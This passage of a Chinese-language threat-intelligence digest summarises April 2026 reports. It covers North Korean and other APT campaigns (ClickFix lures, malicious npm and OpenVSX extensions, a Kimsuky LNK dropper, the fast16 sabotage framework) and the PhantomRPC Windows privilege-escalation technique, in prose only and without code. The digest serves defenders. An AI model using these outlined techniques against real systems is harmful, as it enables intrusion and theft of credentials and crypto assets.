target="_blank">https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">BlueNoroff组织针对Web3/加密货币行业发起定向攻击，通过伪造Calendly会议邀请和拼写错误的Zoom链接诱导受害者进入虚假会议页面，窃取其摄像头视频作为后续诱饵，并利用ClickFix技术诱骗用户复制执行恶意PowerShell命令，进而部署内存后门窃取Telegram会话、浏览器凭证和加密货币钱包密钥，同时通过AI生成虚假头像和深度伪造视频增强欺骗性，最终实现长期持久化控制和资产窃取。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034924" data-ratio="1.054320987654321" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="810" src="https://wechat2rss.xlab.app/img-proxy/?k=4ce58015&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq8euFJJAAduzwLgbKCltAAvwmE9ibz8eazhYjOHuen17pfYibcTrKzaBHRibIxIaIJO34Opaqxz92T3gehIJEqE5feHuO9bDXDDRM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月24日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://panther.com/blog/inside-dprk%E2%80%99s-npm-malware-factory-108-packages-261-versions-and-a-31-day-campaign-wave" target="_blank">https://panther.com/blog/inside-dprk%E2%80%99s-npm-malware-factory-108-packages-261-versions-and-a-31-day-campaign-wave</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Panther威胁研究团队在约30天内监控、聚类并追踪了一场朝鲜（DPRK）关联的npm恶意软件活动，该活动共涉及108个恶意包和261个版本，构成一个高度工业化的恶意软件工厂。攻击者利用BeaverTail恶意软件，通过&#34;Contagious Interview&#34;（传染性面试）模式，以虚假招聘面试为诱饵，诱导开发者下载并执行恶意代码。这一活动属于朝鲜更广泛供应链攻击的一部分，与Lazarus集团相关，其恶意包伪装成合法开发工具，在开发者调用看似正常的功能时触发恶意载荷，窃取浏览器数据、密码管理器信息及加密货币钱包凭证。该活动横跨npm、PyPI、Go、Rust等多个开源生态，自2025年初以来已识别超过1,700个恶意包。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Kimsuky组织针对处方药公司进行攻击</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月27日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://wezard4u.tistory.com/429764" target="_blank">https://wezard4u.tistory.com/429764</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Kimsuky组织利用伪装成Excel文档的LNK文件（文件名伪装为制药公司ERP规格书）实施攻击，该LNK文件内嵌诱饵XLSX文档、计划任务XML以及经XOR编码的PowerShell和JavaScript脚本；执行后释放文件至C:\sysconfigs目录并创建伪装成Avast浏览器更新的计划任务实现持久化，最终PowerShell脚本使用RC4加密通过Dropbox API上传受害主机信息并下载执行远程BAT命令。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">ShadowBrokers泄露中的神秘引用揭示Stuxnet五年前的高精度软件破坏框架&#34;fast16&#34;</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月23日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/" target="_blank">https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SentinelLABS发现了一个可追溯至2005年的网络破坏框架fast16，其核心组件包括嵌入Lua 5.0虚拟机的载体svcmgmt.exe和内核驱动fast16.sys，后者通过在内核层拦截并修改可执行代码，专门针对高精度计算软件（如LS-DYNA、PKPM等工程仿真软件）实施浮点运算篡改，导致计算结果出现系统性偏差；该框架具备蠕虫式自我传播能力，并在ShadowBrokers泄露的NSA文件中被标记为“Nothing to see here – carry on”。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">蔓灵花组织使用NUITKA打包的python样本进行投递</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月29日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/gbir8fE-pjchPbwY4y-NRA" target="_blank">https://mp.weixin.qq.com/s/gbir8fE-pjchPbwY4y-NRA</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">蔓灵花（APT-C-08）组织近期利用NUITKA打包的Python样本作为初始载荷，通过下载执行后门组件获取CMD命令控制权限，进而部署文件窃密组件（监控存储设备变更并同步文件至C2）、Remcos远控后门及Python环境，实现对政府、国防等目标的定向入侵和数据窃取。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034928" data-ratio="0.9260504201680673" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="595" src="https://wechat2rss.xlab.app/img-proxy/?k=1b4eb4b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq8KmTJ4ibePDASx9RkE57Hakgic2UMgHYCVE7woMNA6pUprv2icjdNk0n1fLuXAqTIbLhSoDhcicKmtdUS6EicAO4ffdZibS2hfBArxo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">06</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Lazarus 利用人工智能将对开发者的攻击产业化</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月22日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://expel.com/blog/inside-lazarus-how-north-korea-uses-ai-to-industrialize-attacks-on-developers/" target="_blank">https://expel.com/blog/inside-lazarus-how-north-korea-uses-ai-to-industrialize-attacks-on-developers/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Expel发现并持续追踪一个被评估为高置信度朝鲜国家支持的APT子群HexagonalRodent（别名Famous Chollima子集），该组织利用生成式AI大规模构建虚假招聘公司和钓鱼网站，通过VS Code tasks.json和代码后门植入BeaverTail、OtterCookie和InvisibleFerret恶意软件，专门针对Web3开发者实施加密货币钱包窃取，三个月内窃取约1200万美元数字资产，并首次被观察到通过fast-draft VS Code扩展实施供应链攻击。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034927" src="https://wechat2rss.xlab.app/img-proxy/?k=5c3f2e23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8rTtqkMzdhA6wofhVjLWo54Uz3MzPeoicQTtaib7sWACog2j3UBicfSFlTq5uyuU62ReicDGVTWP1rWwHlLyjczyf40tyMNLbdhJs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034929" src="https://wechat2rss.xlab.app/img-proxy/?k=03e115e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibxdljibyiaMJzYgzZSMHoJH6hybK3iant9b16XOibiaBkUhVZNfAeGtjXyTYw4XWvUbRKfZET2WhePFZpUur2ZkpH81kbsEbn3yGdI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034925" src="https://wechat2rss.xlab.app/img-proxy/?k=4f062a4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqicrZIGQW58xU2SlTjP561jGkM92SA4VPQZcLDRkgahYF6uhu8ibMIAlbhH5U8DtgiaX7h4d2XBibiczWhMQytgISE8LUnBJzsT7m3Y%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034926" src="https://wechat2rss.xlab.app/img-proxy/?k=fd267872&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqicMn3RTfAJY6u1DqBF7Bv6jeicKmZ1YPgHvcjiaLHGGNqCwpCEMRYsCiaCAz5c4G6jtKSHdNj7B5ulSU9E6DKicy6iaiayAzmEpksrw4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">GlassWorm 恶意软件通过 73 个 OpenVSX &#34;沉睡者&#34;扩展卷土重来</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月28日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/zXeY_HXWNDydGbryxWkvVA" target="_blank">https://mp.weixin.qq.com/s/zXeY_HXWNDydGbryxWkvVA</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GlassWorm在OpenVSX扩展市场发起大规模供应链攻击，通过73个休眠扩展（至少6个已激活）采用“良性首发-信任积累-更新投毒”策略，利用瘦加载器从GitHub拉取恶意载荷或执行原生.node模块，动态窃取开发者的加密货币钱包、云凭证和SSH私钥，标志着其战术从硬编码恶意代码演进为生命周期管理式攻击。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">PhantomRPC：Windows RPC 中的一种新的权限提升技术</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月24日</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securelist.com/phantomrpc-rpc-vulnerability/119428/" target="_blank">https://securelist.com/phantomrpc-rpc-vulnerability/119428/</a></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Securelist发现Windows RPC架构中存在一个设计缺陷，允许具有SeImpersonatePrivilege权限的进程通过部署伪造的RPC服务器（模仿如TermService等默认禁用或不可用服务的接口和端点），诱使高权限客户端发起高模拟级别的RPC调用，从而模拟客户端身份将权限提升至SYSTEM或管理员级别；微软评估该漏洞为中等严重性且未分配CVE，决定不立即修补，组织可通过ETW监控RPC异常并启用对应服务来缓解风险。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 